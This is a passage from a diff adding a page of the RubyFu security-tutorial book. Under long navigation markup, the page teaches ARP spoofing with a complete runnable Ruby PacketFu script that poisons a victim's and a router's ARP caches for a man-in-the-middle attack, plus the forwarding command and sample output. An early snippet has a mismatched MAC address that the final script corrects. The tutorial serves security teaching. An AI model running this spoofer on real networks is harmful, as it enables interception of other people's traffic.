+ </ul>
820
+
821
+ </li>
822
+
823
+ <li class="chapter " data-level="4.6" data-path="module_0x4__web_kung_fu/ruby2javascript.html">
824
+
825
+
826
+ <a href="../module_0x4__web_kung_fu/ruby2javascript.html">
827
+
828
+ <i class="fa fa-check"></i>
829
+
830
+ <b>4.6.</b>
831
+
832
+ Ruby 2 JavaScript
833
+ </a>
834
+
835
+
836
+ </li>
837
+
838
+ <li class="chapter " data-level="4.7" data-path="module_0x4__web_kung_fu/web_server_and_proxy.html">
839
+
840
+
841
+ <a href="../module_0x4__web_kung_fu/web_server_and_proxy.html">
842
+
843
+ <i class="fa fa-check"></i>
844
+
845
+ <b>4.7.</b>
846
+
847
+ Web Server and Proxy
848
+ </a>
849
+
850
+
851
+ </li>
852
+
853
+
854
+ </ul>
855
+
856
+ </li>
857
+
858
+ <li class="chapter " data-level="5" data-path="module_0x5__exploitation_kung_fu/index.html">
859
+
860
+
861
+ <a href="../module_0x5__exploitation_kung_fu/index.html">
862
+
863
+ <i class="fa fa-check"></i>
864
+
865
+ <b>5.</b>
866
+
867
+ Module 0x5 | Exploitation Kung Fu
868
+ </a>
869
+
870
+
871
+ <ul class="articles">
872
+
873
+
874
+ <li class="chapter " data-level="5.1" data-path="module_0x5__exploitation_kung_fu/fuzzer.html">
875
+
876
+
877
+ <a href="../module_0x5__exploitation_kung_fu/fuzzer.html">
878
+
879
+ <i class="fa fa-check"></i>
880
+
881
+ <b>5.1.</b>
882
+
883
+ Fuzzer
884
+ </a>
885
+
886
+
887
+ </li>
888
+
889
+ <li class="chapter " data-level="5.2" data-path="module_0x5__exploitation_kung_fu/metasploit.html">
890
+
891
+
892
+ <a href="../module_0x5__exploitation_kung_fu/metasploit.html">
893
+
894
+ <i class="fa fa-check"></i>
895
+
896
+ <b>5.2.</b>
897
+
898
+ Metasploit
899
+ </a>
900
+
901
+
902
+ <ul class="articles">
903
+
904
+
905
+ <li class="chapter " data-level="5.2.1" data-path="module_0x5__exploitation_kung_fu/auxiliary_module.html">
906
+
907
+
908
+ <a href="../module_0x5__exploitation_kung_fu/auxiliary_module.html">
909
+
910
+ <i class="fa fa-check"></i>
911
+
912
+ <b>5.2.1.</b>
913
+
914
+ Auxiliary module
915
+ </a>
916
+
917
+
918
+ </li>
919
+
920
+ <li class="chapter " data-level="5.2.2" data-path="module_0x5__exploitation_kung_fu/exploit_module.html">
921
+
922
+
923
+ <a href="../module_0x5__exploitation_kung_fu/exploit_module.html">
924
+
925
+ <i class="fa fa-check"></i>
926
+
927
+ <b>5.2.2.</b>
928
+
929
+ Exploit module
930
+ </a>
931
+
932
+
933
+ </li>
934
+
935
+ <li class="chapter " data-level="5.2.3" data-path="module_0x5__exploitation_kung_fu/meterpreter.html">
936
+
937
+
938
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter.html">
939
+
940
+ <i class="fa fa-check"></i>
941
+
942
+ <b>5.2.3.</b>
943
+
944
+ Meterpreter
945
+ </a>
946
+
947
+
948
+ <ul class="articles">
949
+
950
+
951
+ <li class="chapter " data-level="5.2.3.1" data-path="module_0x5__exploitation_kung_fu/extensions.html">
952
+
953
+
954
+ <a href="../module_0x5__exploitation_kung_fu/extensions.html">
955
+
956
+ <i class="fa fa-check"></i>
957
+
958
+ <b>5.2.3.1.</b>
959
+
960
+ API and Extensions
961
+ </a>
962
+
963
+
964
+ </li>
965
+
966
+ <li class="chapter " data-level="5.2.3.2" data-path="module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
967
+
968
+
969
+ <a href="../module_0x5__exploitation_kung_fu/meterpreter_scripting.html">
970
+
971
+ <i class="fa fa-check"></i>
972
+
973
+ <b>5.2.3.2.</b>
974
+
975
+ Meterpreter Scripting
976
+ </a>
977
+
978
+
979
+ </li>
980
+
981
+ <li class="chapter " data-level="5.2.3.3" data-path="module_0x5__exploitation_kung_fu/railgun_api_extension.html">
982
+
983
+
984
+ <a href="../module_0x5__exploitation_kung_fu/railgun_api_extension.html">
985
+
986
+ <i class="fa fa-check"></i>
987
+
988
+ <b>5.2.3.3.</b>
989
+
990
+ Railgun API Extension
991
+ </a>
992
+
993
+
994
+ </li>
995
+
996
+
997
+ </ul>
998
+
999
+ </li>
1000
+
1001
+
1002
+ </ul>
1003
+
1004
+ </li>
1005
+
1006
+ <li class="chapter " data-level="5.3" data-path="module_0x5__exploitation_kung_fu/metasm.html">
1007
+
1008
+
1009
+ <a href="../module_0x5__exploitation_kung_fu/metasm.html">
1010
+
1011
+ <i class="fa fa-check"></i>
1012
+
1013
+ <b>5.3.</b>
1014
+
1015
+ metasm
1016
+ </a>
1017
+
1018
+
1019
+ </li>
1020
+
1021
+
1022
+ </ul>
1023
+
1024
+ </li>
1025
+
1026
+ <li class="chapter " data-level="6" data-path="module_0x6__forensic/index.html">
1027
+
1028
+
1029
+ <a href="../module_0x6__forensic/index.html">
1030
+
1031
+ <i class="fa fa-check"></i>
1032
+
1033
+ <b>6.</b>
1034
+
1035
+ Module 0x6 | Forensic Kung Fu
1036
+ </a>
1037
+
1038
+
1039
+ <ul class="articles">
1040
+
1041
+
1042
+ <li class="chapter " data-level="6.1" data-path="module_0x6__forensic/windows_forensic.html">
1043
+
1044
+
1045
+ <a href="../module_0x6__forensic/windows_forensic.html">
1046
+
1047
+ <i class="fa fa-check"></i>
1048
+
1049
+ <b>6.1.</b>
1050
+
1051
+ Windows Forensic
1052
+ </a>
1053
+
1054
+
1055
+ </li>
1056
+
1057
+ <li class="chapter " data-level="6.2" data-path="module_0x6__forensic/android_forensic.html">
1058
+
1059
+
1060
+ <a href="../module_0x6__forensic/android_forensic.html">
1061
+
1062
+ <i class="fa fa-check"></i>
1063
+
1064
+ <b>6.2.</b>
1065
+
1066
+ Android Forensic
1067
+ </a>
1068
+
1069
+
1070
+ </li>
1071
+
1072
+ <li class="chapter " data-level="6.3" data-path="module_0x3__network_kung_fu/network_traffic_analysis.html">
1073
+
1074
+
1075
+ <a href="../module_0x3__network_kung_fu/network_traffic_analysis.html">
1076
+
1077
+ <i class="fa fa-check"></i>
1078
+
1079
+ <b>6.3.</b>
1080
+
1081
+ Network Traffic Analysis
1082
+ </a>
1083
+
1084
+
1085
+ </li>
1086
+
1087
+ <li class="chapter " data-level="6.4" data-path="module_0x6__forensic/parsing_log_files.html">
1088
+
1089
+
1090
+ <a href="../module_0x6__forensic/parsing_log_files.html">
1091
+
1092
+ <i class="fa fa-check"></i>
1093
+
1094
+ <b>6.4.</b>
1095
+
1096
+ Parsing Log Files
1097
+ </a>
1098
+
1099
+
1100
+ </li>
1101
+
1102
+
1103
+ </ul>
1104
+
1105
+ </li>
1106
+
1107
+ <li class="chapter " data-level="7" data-path="references/index.html">
1108
+
1109
+
1110
+ <a href="../references/index.html">
1111
+
1112
+ <i class="fa fa-check"></i>
1113
+
1114
+ <b>7.</b>
1115
+
1116
+ References
1117
+ </a>
1118
+
1119
+
1120
+ </li>
1121
+
1122
+ <li class="chapter " data-level="8" data-path="faqs/index.html">
1123
+
1124
+
1125
+ <a href="../faqs/index.html">
1126
+
1127
+ <i class="fa fa-check"></i>
1128
+
1129
+ <b>8.</b>
1130
+
1131
+ FAQs
1132
+ </a>
1133
+
1134
+
1135
+ </li>
1136
+
1137
+ <li class="chapter " data-level="9" data-path="contributors/index.html">
1138
+
1139
+
1140
+ <a href="../contributors/index.html">
1141
+
1142
+ <i class="fa fa-check"></i>
1143
+
1144
+ <b>9.</b>
1145
+
1146
+ Contributors
1147
+ </a>
1148
+
1149
+
1150
+ <ul class="articles">
1151
+
1152
+
1153
+ <li class="chapter " data-level="9.1" data-path="contributors/todo.html">
1154
+
1155
+
1156
+ <a href="../contributors/todo.html">
1157
+
1158
+ <i class="fa fa-check"></i>
1159
+
1160
+ <b>9.1.</b>
1161
+
1162
+ TODO
1163
+ </a>
1164
+
1165
+
1166
+ </li>
1167
+
1168
+
1169
+ </ul>
1170
+
1171
+ </li>
1172
+
1173
+
1174
+
1175
+
1176
+ <li class="divider"></li>
1177
+ <li>
1178
+ <a href="https://www.gitbook.com" target="blank" class="gitbook-link">
1179
+ Published with GitBook
1180
+ </a>
1181
+ </li>
1182
+
1183
+ </ul>
1184
+ </nav>
1185
+ </div>
1186
+
1187
+ <div class="book-body">
1188
+ <div class="body-inner">
1189
+ <div class="book-header" role="navigation">
1190
+ <!-- Actions Left -->
1191
+
1192
+
1193
+ <!-- Title -->
1194
+ <h1>
1195
+ <i class="fa fa-circle-o-notch fa-spin"></i>
1196
+ <a href="../" >RubyFu</a>
1197
+ </h1>
1198
+ </div>
1199
+
1200
+ <div class="page-wrapper" tabindex="-1" role="main">
1201
+ <div class="page-inner">
1202
+
1203
+
1204
+ <section class="normal" id="section-">
1205
+
1206
+ <h1 id="arp-spoofing"><a name="arp-spoofing" class="plugin-anchor" href="#arp-spoofing"><span class="fa fa-link"></span></a>ARP Spoofing</h1>
1207
+ <p>As you know, ARP Spoofing attack in the core of MitM attacks. In this part we&apos;ll know how to write simple and effective ARP spoofer tool to use it in later spoofing attacks.</p>
1208
+ <h4 id="scenario"><a name="scenario" class="plugin-anchor" href="#scenario"><span class="fa fa-link"></span></a>Scenario</h4>
1209
+ <p>We have 3 machines in this scenario as shown below.</p>
1210
+ <pre><code> |Attacker|
1211
+ |
1212
+ &#x667;
1213
+ |Victim| -----------------&gt; |Router| ---&gt; Internet
1214
+ </code></pre><p>Here the list of IP and MAC addresses of each of theme in the following table<sup><a href="#fn_1" id="reffn_1">1</a></sup></p>
1215
+ <table>
1216
+ <thead>
1217
+ <tr>
1218
+ <th>Host/Info</th>
1219
+ <th style="text-align:center">IP Address</th>
1220
+ <th style="text-align:center">MAC Address</th>
1221
+ </tr>
1222
+ </thead>
1223
+ <tbody>
1224
+ <tr>
1225
+ <td>Attacker</td>
1226
+ <td style="text-align:center">192.168.0.100</td>
1227
+ <td style="text-align:center">3C:77:E6:68:66:E9</td>
1228
+ </tr>
1229
+ <tr>
1230
+ <td>Victim</td>
1231
+ <td style="text-align:center">192.168.0.21</td>
1232
+ <td style="text-align:center">00:0C:29:38:1D:61</td>
1233
+ </tr>
1234
+ <tr>
1235
+ <td>Router</td>
1236
+ <td style="text-align:center">192.168.0.1</td>
1237
+ <td style="text-align:center">00:50:7F:E6:96:20</td>
1238
+ </tr>
1239
+ </tbody>
1240
+ </table>
1241
+ <p>To know our/attacker&apos;s interface information</p>
1242
+ <pre><code class="lang-ruby">info = <span class="hljs-constant">PacketFu::Utils</span>.whoami?(<span class="hljs-symbol">:iface</span> =&gt; <span class="hljs-string">&quot;wlan0&quot;</span>)
1243
+ </code></pre>
1244
+ <p>returns a hash</p>
1245
+ <pre><code>{:iface=&gt;&quot;wlan0&quot;,
1246
+ :pcapfile=&gt;&quot;/tmp/out.pcap&quot;,
1247
+ :eth_saddr=&gt;&quot;3c:77:e6:68:66:e9&quot;,
1248
+ :eth_src=&gt;&quot;&lt;w\xE6hf\xE9&quot;,
1249
+ :ip_saddr=&gt;&quot;192.168.0.13&quot;,
1250
+ :ip_src=&gt;3232235533,
1251
+ :ip_src_bin=&gt;&quot;\xC0\xA8\x00\r&quot;,
1252
+ :eth_dst=&gt;&quot;\x00P\x7F\xE6\x96 &quot;,
1253
+ :eth_daddr=&gt;&quot;00:50:7f:e6:96:20&quot;}
1254
+ </code></pre><p>So you can extract these information like any hash <code>info[:iface]</code>, <code>info[:ip_saddr]</code>, <code>info[:eth_saddr]</code>, etc..</p>
1255
+ <p><strong>Building victim&apos;s ARP packet</strong></p>
1256
+ <pre><code class="lang-ruby"><span class="hljs-comment"># Build Ethernet header</span>
1257
+ arp_packet_victim = <span class="hljs-constant">PacketFu::ARPPacket</span>.new
1258
+ arp_packet_victim.eth_saddr = <span class="hljs-string">&quot;3C:77:E6:68:66:E9&quot;</span> <span class="hljs-comment"># our MAC address</span>
1259
+ arp_packet_victim.eth_daddr = <span class="hljs-string">&quot;00:0C:29:38:1D:61&quot;</span> <span class="hljs-comment"># the victim&apos;s MAC address</span>
1260
+ <span class="hljs-comment"># Build ARP Packet</span>
1261
+ arp_packet_victim.arp_saddr_mac = <span class="hljs-string">&quot;3C:77:E6:68:66:E9&quot;</span> <span class="hljs-comment"># our MAC address</span>
1262
+ arp_packet_victim.arp_daddr_mac = <span class="hljs-string">&quot;00:0C:29:38:1D:61&quot;</span> <span class="hljs-comment"># the victim&apos;s MAC address</span>
1263
+ arp_packet_victim.arp_saddr_ip = <span class="hljs-string">&quot;192.168.0.1&quot;</span> <span class="hljs-comment"># the router&apos;s IP</span>
1264
+ arp_packet_victim.arp_daddr_ip = <span class="hljs-string">&quot;192.168.0.21&quot;</span> <span class="hljs-comment"># the victim&apos;s IP</span>
1265
+ arp_packet_victim.arp_opcode = <span class="hljs-number">2</span> <span class="hljs-comment"># arp code 2 == ARP reply</span>
1266
+ </code></pre>
1267
+ <p><strong>Building router packet</strong></p>
1268
+ <pre><code class="lang-ruby"><span class="hljs-comment"># Build Ethernet header</span>
1269
+ arp_packet_router = <span class="hljs-constant">PacketFu::ARPPacket</span>.new
1270
+ arp_packet_router.eth_saddr = <span class="hljs-string">&quot;3C:77:E6:68:66:E9&quot;</span> <span class="hljs-comment"># our MAC address</span>
1271
+ arp_packet_router.eth_daddr = <span class="hljs-string">&quot;00:0C:29:38:1D:61&quot;</span> <span class="hljs-comment"># the router&apos;s MAC address</span>
1272
+ <span class="hljs-comment"># Build ARP Packet</span>
1273
+ arp_packet_router.arp_saddr_mac = <span class="hljs-string">&quot;3C:77:E6:68:66:E9&quot;</span> <span class="hljs-comment"># our MAC address</span>
1274
+ arp_packet_router.arp_daddr_mac = <span class="hljs-string">&quot;00:50:7F:E6:96:20&quot;</span> <span class="hljs-comment"># the router&apos;s MAC address</span>
1275
+ arp_packet_router.arp_saddr_ip = <span class="hljs-string">&quot;192.168.0.21&quot;</span> <span class="hljs-comment"># the victim&apos;s IP</span>
1276
+ arp_packet_router.arp_daddr_ip = <span class="hljs-string">&quot;192.168.0.1&quot;</span> <span class="hljs-comment"># the router&apos;s IP</span>
1277
+ arp_packet_router.arp_opcode = <span class="hljs-number">2</span> <span class="hljs-comment"># arp code 2 == ARP reply</span>
1278
+ </code></pre>
1279
+ <p><strong>Run ARP Spoofing attack</strong></p>
1280
+ <pre><code class="lang-ruby"><span class="hljs-comment"># Send our packet through the wire</span>
1281
+ <span class="hljs-keyword">while</span> <span class="hljs-keyword">true</span>
1282
+ sleep <span class="hljs-number">1</span>
1283
+ puts <span class="hljs-string">&quot;[+] Sending ARP packet to victim: <span class="hljs-subst">#{arp_packet_victim.arp_daddr_ip}</span>&quot;</span>
1284
+ arp_packet_victim.to_w(info[<span class="hljs-symbol">:iface</span>])
1285
+ puts <span class="hljs-string">&quot;[+] Sending ARP packet to router: <span class="hljs-subst">#{arp_packet_router.arp_daddr_ip}</span>&quot;</span>
1286
+ arp_packet_router.to_w(info[<span class="hljs-symbol">:iface</span>])
1287
+ <span class="hljs-keyword">end</span>
1288
+ </code></pre>
1289
+ <p>Source<sup><a href="#fn_2" id="reffn_2">2</a></sup></p>
1290
+ <p>Wrapping all together and run as <code>root</code></p>
1291
+ <pre><code class="lang-ruby"><span class="hljs-comment">#!/usr/bin/env ruby</span>
1292
+ <span class="hljs-comment">#</span>
1293
+ <span class="hljs-comment"># ARP Spoof Basic script</span>
1294
+ <span class="hljs-comment">#</span>
1295
+ <span class="hljs-keyword">require</span> <span class="hljs-string">&apos;packetfu&apos;</span>
1296
+
1297
+ attacker_mac = <span class="hljs-string">&quot;3C:77:E6:68:66:E9&quot;</span>
1298
+ victim_ip = <span class="hljs-string">&quot;192.168.0.21&quot;</span>
1299
+ victim_mac = <span class="hljs-string">&quot;00:0C:29:38:1D:61&quot;</span>
1300
+ router_ip = <span class="hljs-string">&quot;192.168.0.1&quot;</span>
1301
+ router_mac = <span class="hljs-string">&quot;00:50:7F:E6:96:20&quot;</span>
1302
+
1303
+ info = <span class="hljs-constant">PacketFu::Utils</span>.whoami?(<span class="hljs-symbol">:iface</span> =&gt; <span class="hljs-string">&quot;wlan0&quot;</span>)
1304
+ <span class="hljs-comment">#</span>
1305
+ <span class="hljs-comment"># Victim</span>
1306
+ <span class="hljs-comment">#</span>
1307
+ <span class="hljs-comment"># Build Ethernet header</span>
1308
+ arp_packet_victim = <span class="hljs-constant">PacketFu::ARPPacket</span>.new
1309
+ arp_packet_victim.eth_saddr = attacker_mac <span class="hljs-comment"># attacker MAC address</span>
1310
+ arp_packet_victim.eth_daddr = victim_mac <span class="hljs-comment"># the victim&apos;s MAC address</span>
1311
+ <span class="hljs-comment"># Build ARP Packet</span>
1312
+ arp_packet_victim.arp_saddr_mac = attacker_mac <span class="hljs-comment"># attacker MAC address</span>
1313
+ arp_packet_victim.arp_daddr_mac = victim_mac <span class="hljs-comment"># the victim&apos;s MAC address</span>
1314
+ arp_packet_victim.arp_saddr_ip = router_ip <span class="hljs-comment"># the router&apos;s IP</span>
1315
+ arp_packet_victim.arp_daddr_ip = victim_ip <span class="hljs-comment"># the victim&apos;s IP</span>
1316
+ arp_packet_victim.arp_opcode = <span class="hljs-number">2</span> <span class="hljs-comment"># arp code 2 == ARP reply</span>
1317
+
1318
+ <span class="hljs-comment">#</span>
1319
+ <span class="hljs-comment"># Router</span>
1320
+ <span class="hljs-comment">#</span>
1321
+ <span class="hljs-comment"># Build Ethernet header</span>
1322
+ arp_packet_router = <span class="hljs-constant">PacketFu::ARPPacket</span>.new
1323
+ arp_packet_router.eth_saddr = attacker_mac <span class="hljs-comment"># attacker MAC address</span>
1324
+ arp_packet_router.eth_daddr = router_mac <span class="hljs-comment"># the router&apos;s MAC address</span>
1325
+ <span class="hljs-comment"># Build ARP Packet</span>
1326
+ arp_packet_router.arp_saddr_mac = attacker_mac <span class="hljs-comment"># attacker MAC address</span>
1327
+ arp_packet_router.arp_daddr_mac = router_mac <span class="hljs-comment"># the router&apos;s MAC address</span>
1328
+ arp_packet_router.arp_saddr_ip = victim_ip <span class="hljs-comment"># the victim&apos;s IP</span>
1329
+ arp_packet_router.arp_daddr_ip = router_ip <span class="hljs-comment"># the router&apos;s IP</span>
1330
+ arp_packet_router.arp_opcode = <span class="hljs-number">2</span> <span class="hljs-comment"># arp code 2 == ARP reply</span>
1331
+
1332
+ <span class="hljs-keyword">while</span> <span class="hljs-keyword">true</span>
1333
+ sleep <span class="hljs-number">1</span>
1334
+ puts <span class="hljs-string">&quot;[+] Sending ARP packet to victim: <span class="hljs-subst">#{arp_packet_victim.arp_daddr_ip}</span>&quot;</span>
1335
+ arp_packet_victim.to_w(info[<span class="hljs-symbol">:iface</span>])
1336
+ puts <span class="hljs-string">&quot;[+] Sending ARP packet to router: <span class="hljs-subst">#{arp_packet_router.arp_daddr_ip}</span>&quot;</span>
1337
+ arp_packet_router.to_w(info[<span class="hljs-symbol">:iface</span>])
1338
+ <span class="hljs-keyword">end</span>
1339
+ </code></pre>
1340
+ <blockquote>
1341
+ <p>Note: Don&apos;t forget to enable packet forwarding on your system to allow victim to browse internet.</p>
1342
+ <p><code>echo &quot;1&quot; &gt; /proc/sys/net/ipv4/ip_forward</code></p>
1343
+ </blockquote>
1344
+ <p>Returns, time to wiresharking ;)</p>
1345
+ <pre><code>[+] Sending ARP packet to victim: 192.168.0.21
1346
+ [+] Sending ARP packet to router: 192.168.0.1
1347
+ .
1348
+ .
1349
+ .
1350
+ [+] Sending ARP packet to victim: 192.168.0.21
1351
+ [+] Sending ARP packet to router: 192.168.0.1
1352
+ [+] Sending ARP packet to victim: 192.168.0.21
1353
+ [+] Sending ARP packet to router: 192.168.0.1
1354
+ </code></pre><h2 id=""><a name="" class="plugin-anchor" href="#"><span class="fa fa-link"></span></a><br><br><br></h2>
1355
+ <blockquote id="fn_1">
1356
+ <sup>1</sup>. Create table the easy way - <a href="http://www.tablesgenerator.com/markdown_tables" target="_blank">Table Generator</a><a href="#reffn_1" title="Jump back to footnote [1] in the text."> &#x21A9;</a>
1357
+ </blockquote>
1358
+ <blockquote id="fn_2">
1359
+ <sup>2</sup>. Source: <a href="http://crushbeercrushcode.org/2012/10/ruby-dns-spoofing-using-packetfu/" target="_blank">DNS Spoofing Using PacketFu</a><a href="#reffn_2" title="Jump back to footnote [2] in the text."> &#x21A9;</a>
1360
+ </blockquote>
1361
+
1362
+
1363
+ </section>
1364
+
1365
+
1366
+ </div>
1367
+ </div>
1368
+ </div>
1369
+
1370
+
1371
+ <a href="../module_0x3__network_kung_fu/packet_manipulation.html" class="navigation navigation-prev " aria-label="Previous page: Packet manipulation"><i class="fa fa-angle-left"></i></a>
1372
+
1373
+
1374
+ <a href="../module_0x3__network_kung_fu/dns_spoofing.html" class="navigation navigation-next " aria-label="Next page: DNS Spoofing"><i class="fa fa-angle-right"></i></a>
1375
+
1376
+ </div>
1377
+ </div>
1378
+
1379
+
1380
+ <script src="../gitbook/app.js"></script>
1381
+
1382
+
1383
+ <script src="../gitbook/plugins/gitbook-plugin-splitter/splitter.js"></script>
1384
+
1385
+
1386
+
1387
+ <script src="../gitbook/plugins/gitbook-plugin-book-summary-scroll-position-saver/book-summary-scroll-position-saver.js"></script>
1388
+
1389
+
1390
+
1391
+ <script src="../gitbook/plugins/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
1392
+
1393
+
1394
+
1395
+ <script src="../gitbook/plugins/gitbook-plugin-search/lunr.min.js"></script>
1396
+
1397
+
1398
+
1399
+ <script src="../gitbook/plugins/gitbook-plugin-search/search.js"></script>
1400
+
1401
+
1402
+
1403
+ <script src="../gitbook/plugins/gitbook-plugin-sharing/buttons.js"></script>
1404
+
1405
+
1406
+
1407
+ <script src="../gitbook/plugins/gitbook-plugin-fontsettings/buttons.js"></script>
1408
+
1409
+
1410
+ <script>
1411
+ require(["gitbook"], function(gitbook) {
1412
+ var config = {"addcssjs":{"js":["styles/header.js"]},"anchors":{},"todo":{},"splitter":{},"book-summary-scroll-position-saver":{},"expandable-chapters":{},"highlight":{},"search":{"maxIndexSize":1000000},"sharing":{"facebook":true,"twitter":true,"google":false,"weibo":false,"instapaper":false,"vk":false,"all":["facebook","google","twitter","weibo","instapaper"]},"fontsettings":{"theme":"white","family":"sans","size":2}};
1413
+ gitbook.start(config);
1414
+ });
1415
+ </script>
1416
+
1417
+
1418
+ </body>
1419
+
1420
+ </html>